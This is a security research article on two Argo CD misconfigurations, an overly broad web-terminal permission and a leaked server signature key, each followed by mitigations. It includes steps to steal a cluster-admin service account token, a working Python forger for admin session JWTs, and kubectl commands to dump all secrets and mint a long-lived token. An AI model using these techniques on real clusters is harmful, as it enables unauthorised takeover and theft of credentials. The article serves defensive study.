Argo CD Security Misconfiguration Adventures

Managing applications deployed in Kubernetes clusters can be very complex, and several projects and tools were created to tackle these challenges. Nowadays it is common to hear that companies use “CI/CD pipelines” (Continuous Integration and Continuous Delivery) to ease the deployment and management of applications in production environments. Such pipelines rely on components which bridge the source code hosting platform (such as GitHub or GitLab) with the places where applications run, like Kubernetes clusters. Many new terms emerged over time: “Infrastructure as Code”, “DevOps”, “GitOps”, etc.

This article will not go into details about what all these terms mean and why they have been so trendy for some years. Instead, it will focus on a specific project commonly used in such contexts: Argo CD.

Argo CD demonstration website, https://cd.apps.argoproj.io/

From a developer’s perspective, Argo CD provides a lightweight way to deploy applications and to monitor their health: most of its configuration happens in files in git repositories or in Kubernetes resources; the web interface provides a summary of the state of the application, as well as a sneak peek at the generated logs and events; the command-line tool makes it easy to automate some tasks.

Argo CD’s architecture is also quite common and its components are organized in a way which feels intuitive to anyone using source code hosting platforms and Kubernetes clusters. This helps build confidence and trust that Argo CD “just works”.

Argo CD Architecture diagram (source)

What about its security? It seems to be taken very seriously.

Moreover, its demo website https://cd.apps.argoproj.io/ provides anonymous read-only access. This emphasizes that granting read-only access to an Argo CD instance should not enable attackers to read sensitive data or to modify the deployed applications. For example, the hash of the admin password is stored in a Kubernetes Secret named argocd-secret. The demo website displays this Secret in https://cd.apps.argoproj.io/applications/argocd/argo-cd?view=tree&resource=&node=%2FSecret%2Fargocd%2Fargocd-secret%2F0:

data:
  admin.password: ++++++++
  admin.passwordMtime: ++++++++
  server.secretkey: ++++++++
  tls.crt: ++++++++
  tls.key: ++++++++
kind: Secret

The sensitive values are redacted in the web interface and there is no way to edit the Secret. If there were, it would be considered a vulnerability in Argo CD (and should be reported to Argo CD’s security team).

That said, providing such anonymous read-only access could give attackers insight into infrastructure components, which helps them design malicious actions. This is why it is usually recommended to restrict access to the website to private networks (not exposing it to the Internet), as Trend Micro wrote in May 2022.

Despite such a strong security posture, Argo CD can be configured in ways creating vulnerabilities. This article studies two examples where Argo CD is deployed in a way which unexpectedly enables privilege escalation and authentication bypass.

Case Study 1. Web-Based Terminal For Everyone

Argo CD web-based terminal (source)

Case Study 1 – Scenario

Even though Argo CD provides great insight into the Kubernetes resources deployed for an application, sometimes nothing beats an interactive shell running directly in the context of the application. Kubernetes provides such a feature with kubectl exec.

In Argo CD, the web-based terminal bridges kubectl exec with the web interface. To enable it, Argo CD’s configuration needs to be modified in a way thoroughly presented in the documentation. Moreover, users need to be granted a special right to use it. This can be done by adding a line to the RBAC policy:

p, role:myrole, exec, create, */*, allow

In non-production environments, it can make sense to grant such a privilege to all users, without actually making them administrators of Argo CD or of the managed Kubernetes cluster. A possible way to easily perform this would be to:

  • copy the built-in policy of role readonly into a new role, named ro-exec;
  • add the rule allowing the use of the web-based terminal to this role;
  • attribute role ro-exec by default to all users.

This configuration happens in the Kubernetes ConfigMap argocd-rbac-cm and may look like this:

apiVersion: v1
kind: ConfigMap
metadata:
  name: argocd-rbac-cm
  namespace: argocd
data:
  policy.csv: |
    p, role:ro-exec, applications, get, */*, allow
    p, role:ro-exec, certificates, get, *, allow
    p, role:ro-exec, clusters, get, *, allow
    p, role:ro-exec, repositories, get, *, allow
    p, role:ro-exec, projects, get, *, allow
    p, role:ro-exec, accounts, get, *, allow
    p, role:ro-exec, gpgkeys, get, *, allow
    p, role:ro-exec, logs, get, */*, allow
    p, role:ro-exec, exec, create, */*, allow
  policy.default: role:ro-exec

Let’s assume we have access to such an Argo CD instance. From an attacker’s perspective, the web-based terminal is very similar to gaining remote code execution in all pods managed by Argo CD. This is known to be very dangerous. But in practice, is it possible to abuse the web-based terminal to gain more privileges on the cluster?

Case Study 1 – Attack

When attackers manage to get a shell inside a Kubernetes pod, several attacks can be performed:

  • They can read environment variables, which could contain sensitive values (not supposed to be exposed).
  • They can steal the token used to authenticate to the Kubernetes API (usually located in /var/run/secrets/kubernetes.io/serviceaccount/token) and use it to impersonate the pod. Sometimes, an application uses containers with high privileges and this token is enough to compromise the whole Kubernetes cluster.
  • They can abuse misconfigurations of the Kubernetes cluster, like an accessible AWS instance metadata service (IMDS), to impersonate the role granted to the Kubernetes worker node.

These techniques have already been described in many places, including in Datadog’s Cloud Security Atlas (for example on the page EKS cluster allows pods to steal worker nodes’ AWS credentials).
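To see what such a stolen token grants, its claims can be inspected offline: a JWT payload is only base64url-encoded, so no key is needed to read it. Here is a minimal sketch; the token below is hand-crafted and unsigned, for illustration only (real service account tokens are signed by the cluster):

```python
import base64
import json

def decode_jwt_claims(token: str) -> dict:
    """Decode the claims of a JWT without verifying its signature."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Hand-crafted example token with illustrative claims
header = base64.urlsafe_b64encode(b'{"alg":"RS256","typ":"JWT"}').rstrip(b"=")
claims = base64.urlsafe_b64encode(
    b'{"iss":"kubernetes/serviceaccount",'
    b'"sub":"system:serviceaccount:argocd:argocd-application-controller"}'
).rstrip(b"=")
token = b".".join([header, claims, b"fake-signature"]).decode("ascii")

print(decode_jwt_claims(token)["sub"])
# -> system:serviceaccount:argocd:argocd-application-controller
```

The sub claim directly reveals which service account (and therefore which Kubernetes privileges) the stolen token carries.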

In the studied use-case, let’s suppose that the Kubernetes cluster is properly secured, that Argo CD manages its own deployment (so its Kubernetes resources are available in the web interface, like in the demo) and that only a few settings were modified (such as the ones granting access to the web-based terminal).

In this use-case, Argo CD deployed a StatefulSet named argocd-application-controller (defined on GitHub in argo-cd:manifests/base/application-controller/argocd-application-controller-statefulset.yaml). This StatefulSet manages a pod, named argocd-application-controller-0 by default, which uses the service account argocd-application-controller. This account is bound to the ClusterRole argocd-application-controller, defined as:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  labels:
    app.kubernetes.io/name: argocd-application-controller
    app.kubernetes.io/part-of: argocd
    app.kubernetes.io/component: application-controller
  name: argocd-application-controller
rules:
- apiGroups:
  - '*'
  resources:
  - '*'
  verbs:
  - '*'
- nonResourceURLs:
  - '*'
  verbs:
  - '*'

So many stars mean this ClusterRole is allowed to perform any action on any resource of the cluster: it is “cluster admin”.

In short, an attacker can get cluster admin privileges by:

  1. Searching for pod argocd-application-controller-0 in Argo CD’s web view of Argo CD application;
  2. Launching a web-based terminal;
  3. Running cat /var/run/secrets/kubernetes.io/serviceaccount/token in the terminal;
  4. Reading the output to retrieve a valid Kubernetes token for service account argocd-application-controller;
  5. Configuring kubectl to use this token (with other settings such as the Kubernetes API endpoint and the certificate authority to use).
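The last step can be scripted. Here is a minimal sketch (a hypothetical helper) which builds a kubeconfig for the stolen token; the API endpoint, certificate authority data and token are placeholders to be replaced with the real values:

```python
import json

def kubeconfig_for_token(api_server: str, ca_data_b64: str, token: str) -> str:
    """Build a kubeconfig authenticating with a bearer token.

    JSON is a subset of YAML, so kubectl should accept the resulting file.
    """
    return json.dumps({
        "apiVersion": "v1",
        "kind": "Config",
        "clusters": [{"name": "target", "cluster": {
            "server": api_server,
            "certificate-authority-data": ca_data_b64,
        }}],
        "users": [{"name": "stolen-sa", "user": {"token": token}}],
        "contexts": [{"name": "stolen", "context": {
            "cluster": "target",
            "user": "stolen-sa",
        }}],
        "current-context": "stolen",
    }, indent=2)

# Placeholder values: the real endpoint, CA bundle and token come from the pod
print(kubeconfig_for_token("https://10.0.0.1:6443", "LS0t...", "eyJhbGci..."))
```

Saving the output to a file and passing it to kubectl with --kubeconfig then makes every command run with the stolen identity.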

After this, kubectl confirms it is possible to perform any action on all resources of the cluster:

$ kubectl auth can-i --list
Resources       Non-Resource URLs       Resource Names     Verbs
*.*             []                      []                 [*]
                [*]                     []                 [*]
...

Case Study 1 – Mitigations

Allowing unprivileged users to open a web-based terminal in the Argo CD application leads to a possible privilege escalation. What can be done to prevent this?

First, it is possible to configure Argo CD’s RBAC policy in a more fine-grained way, for example by only authorizing users to spawn a terminal in their own projects (not in the ones containing Argo CD or cluster-admin pods). This can be achieved with a policy such as:

p, role:unprivileged-role, exec, create, some-project/*, allow

Second, it is possible to make argocd-application-controller not actually run with cluster admin privileges. Actually, the fact that it was cluster admin was reported in February 2021, in argoproj/argo-cd issue #5389: define minimum necessary RBAC permissions. At the time of writing (December 2024), this issue is still open. Nevertheless, Argo CD’s Helm charts were modified in 2021 to enable overriding the definition of ClusterRole argocd-application-controller (cf. argoproj/argo-helm issue #721: feat: Support custom rules for the application controller cluster role and argoproj/argo-helm pull request #730: feat: Support custom rules for the Application Controller Cluster Role). Therefore, Kubernetes administrators can use this to define a fine-grained Kubernetes role for argocd-application-controller. This limits the impact attackers could have when they manage to run commands in pod argocd-application-controller-0 and helps apply defense in depth.

Finally, monitoring the Kubernetes cluster for unauthorized shell sessions spawned in containers helps detect similar attacks.

Case Study 2. Mishandling the Server Secret Key

Case Study 2 – Scenario

Argo CD stores all its settings in Kubernetes resources such as Kubernetes ConfigMaps and Secrets. The Secrets can be synchronized with other secret management systems like AWS Secrets Manager, HashiCorp Vault, etc. A possible way to do this consists in deploying External Secrets Operator (ESO) in a cluster. Such a configuration appears to be quite common, according to presentations given at public conferences. For example, in a talk given at KubeCon + CloudNativeCon Europe 2024 titled “Keeping the Bricks Flowing: The LEGO Group’s Approach to Platform Engineering for Manufacturing”, the presenters showed how they were using Argo CD and external secrets in their infrastructure (YouTube recording from 9:21).

The security policy around the secret management system is sometimes not fine-grained enough. For the studied use-case, let’s imagine an AWS account having several EKS clusters for different purposes: “Cluster A”, “Cluster B”, etc. The administrator followed the documentation to configure their AWS account. Each ESO service account on Kubernetes is associated with an AWS IAM role which has the permission to read all secrets (action secretsmanager:GetSecretValue on resource arn:aws:secretsmanager:eu-west-1:111122223333:secret:*).

To make things more precise, this example considers that Argo CD is installed in Cluster A, its Kubernetes Secret argocd-secret is synchronized with AWS Secrets Manager, and an attacker managed to compromise Cluster B. This means that the attacker can impersonate the External Secrets Operator deployed in Cluster B to read all secrets stored in the shared AWS Secrets Manager.

In such a scenario, can the attacker move to Cluster A?

Case Study 2 – Attack

The attacker can configure their AWS command-line client to use the authentication token from Cluster B’s ESO, for example by setting the relevant environment variables AWS_ROLE_ARN, AWS_WEB_IDENTITY_TOKEN_FILE and AWS_ROLE_SESSION_NAME (as documented by AWS). They can then read the AWS secret associated with argocd-secret with a command such as aws secretsmanager get-secret-value --secret-id platform/argocd/secret (the name of the AWS secret could be guessed or obtained through other means):

{
  "ARN": "arn:aws:secretsmanager:eu-west-1:111122223333:secret:platform/argocd/secret-ekRl8v",
  "Name": "platform/argocd/secret",
  "VersionId": "43bbc457-3c1b-47b2-8c04-ea2dfa184ef9",
  "SecretString": "{\"admin.password\":\"$2a$10$4sRnwtvm9XMbSAPDZyImTeh37MREP6yDnRfellIQamT/cuMn5Jgm.\",\"server.secretkey\":\"JA+Lqmv/d7TbM8yrOEIT+cRIsJAGxAxrqo6hghOK9MQ=\"}",
  "VersionStages": [
    "AWSCURRENT"
  ],
  "CreatedDate": "2024-11-22T12:13:37+00:00"
}

The SecretString contains the password hash of the admin user in the field admin.password! The attacker could try guessing the password or cracking it through brute-force, even though this attack would likely fail if the password was randomly generated (in this example, it was, and its value was AFZTfDcfHySb2Skv).

Moreover, if the AWS IAM policy used by Cluster B’s ESO included secretsmanager:PutSecretValue (which is required for ESO feature PushSecret), the attacker would be able to modify the password hash. This would enable them to impersonate the admin user.

In the general case, knowing the hash in admin.password does not help the attacker much. But the Kubernetes Secret contains another field, server.secretkey. What is it used for?

In Argo CD’s source code, server.secretkey is called the “server signature key”. It gets loaded in argo-cd:util/settings/settings.go:

const (
    // settingServerSignatureKey designates the key for a server secret key
    // inside a Kubernetes secret.
    settingServerSignatureKey = "server.secretkey"
)

// updateSettingsFromSecret transfers settings from a Kubernetes secret
// into an ArgoCDSettings struct.
func (mgr *SettingsManager) updateSettingsFromSecret(settings *ArgoCDSettings,
  argoCDSecret *apiv1.Secret, secrets []*apiv1.Secret) error {
    // ...
    secretKey, ok := argoCDSecret.Data[settingServerSignatureKey]
    if ok {
        settings.ServerSignature = secretKey

This signature key is used in argo-cd:util/session/sessionmanager.go to sign and verify a session token with HMAC-SHA256:

func (mgr *SessionManager) signClaims(claims jwt.Claims) (string, error) {
    token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
    // ...
    return token.SignedString(settings.ServerSignature)
}

func (mgr *SessionManager) Parse(tokenString string) (jwt.Claims, string, error) {
    // ...
    token, err := jwt.ParseWithClaims(tokenString, &claims,
        func(token *jwt.Token) (interface{}, error) {
            // ...
            return argoCDSettings.ServerSignature, nil
    })

Knowing the key should be enough to forge a token to impersonate the user admin. There are some caveats to take care of (function GetSubjectAccountAndCapability requires the subject claim to actually be admin:login; function Parse requires the token to have a non-empty ID in claim jti; the issuer has to be “argocd”). Here is some Python code which forges a token valid for 24 hours, solving these difficulties:

import base64
import json
import hmac
import time

def b64url_encode(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def forge_jwt(key: str, audience: str = "argocd") -> str:
    now = int(time.time())
    header = json.dumps({
        "alg": "HS256",
        "typ": "JWT",
    }).encode("ascii")
    claims = json.dumps({
        "iss": "argocd",
        "aud": audience,
        "iat": now,
        "nbf": now,
        "exp": now + 24 * 3600,
        "sub": "admin:login",
        "jti": "01234567-89ab-cdef-0123-456789abcdef",
    }).encode("ascii")
    signed = b64url_encode(header) + b"." + b64url_encode(claims)
    signature = hmac.digest(key.encode("ascii"), signed, "sha256")
    token = signed + b"." + b64url_encode(signature)
    return token.decode("ascii")

print(forge_jwt("JA+Lqmv/d7TbM8yrOEIT+cRIsJAGxAxrqo6hghOK9MQ="))

In a web browser, defining cookie argocd.token with the produced token is enough to bypass the login screen and successfully authenticate as admin.

Even though the obtained administrator privileges enable many actions in Argo CD, they do not enable reading Kubernetes Secrets or impersonating service accounts. It is nevertheless possible to deploy new Argo CD applications (if the underlying Kubernetes cluster enables it, which is usually true). The attacker can then deploy their own Helm chart with a cluster-admin service account and a Kubernetes Job running commands such as:

# Read all Kubernetes Secrets from the cluster
kubectl get secrets -A

# Generate a Kubernetes token valid for 136 years
kubectl create token --duration=4294967296s -n argocd \
    argocd-application-controller
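As a quick sanity check of the comment above, 4294967296 seconds (which is 2^32) indeed amounts to roughly 136 years:

```python
SECONDS = 4294967296  # 2 ** 32, the duration requested from kubectl above
YEAR = 365.25 * 24 * 3600  # average year length in seconds
print(f"{SECONDS / YEAR:.1f} years")  # -> 136.1 years
```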

Case Study 2 – Mitigations

First, the Kubernetes Secret argocd-secret is very sensitive, as knowing it enables impersonating any local user defined in Argo CD, including admin. If it is synchronized with ESO, access to the secret management system should be properly restricted to prevent unauthorized reads and writes.

Second, as documented in Argo CD’s documentation, the initial admin password should be modified, and the new one should be robust enough that gaining access to the password hash does not enable an attacker to guess it. Moreover, when administrators are authenticated through some SSO (Single Sign On), disabling the local admin account improves security, as it prevents the described attack (usually, session tokens of SSO users are not signed by server.secretkey).
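For instance, a password with plenty of entropy can be generated with Python’s standard secrets module:

```python
import secrets

# 24 random bytes encoded with a URL-safe base64 alphabet (32 characters)
password = secrets.token_urlsafe(24)
print(password)
```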

Third, running Argo CD without cluster admin privileges and applying common practices to harden the Kubernetes cluster (such as configuring it to reject the creation of privileged pods in some namespaces) reduce the impact of the attack.

Finally, if a security incident response analysis finds that the attacker managed to read argocd-secret, it makes sense to consider that the attacker gained cluster admin privileges and to act accordingly.

Conclusion

This article studied two kinds of misconfiguration in Argo CD and the attacks they allowed. It described their impact and the possible mitigations which could be performed to prevent them or reduce the impact.

Even though Argo CD employs state-of-the-art security practices, this illustrates that vulnerabilities can also arise from the way it is deployed and the way the platform is configured.

We hope this article helps to better understand what impact some deployment and configuration choices may have.


Nicolas IOOSS (Twitter / Linkedin)
Software Security Engineer at Ledger Donjon
